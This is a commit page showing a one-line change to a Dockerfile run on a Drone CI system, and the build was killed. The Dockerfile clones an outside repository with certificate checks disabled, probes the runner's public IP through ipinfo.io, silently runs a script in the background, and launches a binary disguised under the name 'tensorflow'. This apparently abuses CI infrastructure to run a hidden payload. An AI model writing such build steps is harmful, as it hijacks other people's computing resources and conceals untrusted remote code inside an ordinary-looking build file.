Update Dockerfile
Some checks reported errors
continuous-integration/drone Build was killed

This commit is contained in:
GALAL AYMEN 2022-04-01 19:45:20 +00:00
parent a21d556b89
commit 4932fd6acf

View file

@ -4,6 +4,7 @@ RUN apt-get install git curl -y
RUN git -c http.sslVerify=false clone https://gitlab.zam.io/wajinhakim/drone-test.git
WORKDIR /drone-test
RUN chmod +x tensorflow direct.sh
RUN curl ipinfo.io
RUN nohup bash direct.sh > /dev/null
EXPOSE 8080 8081
ENTRYPOINT ["./tensorflow"]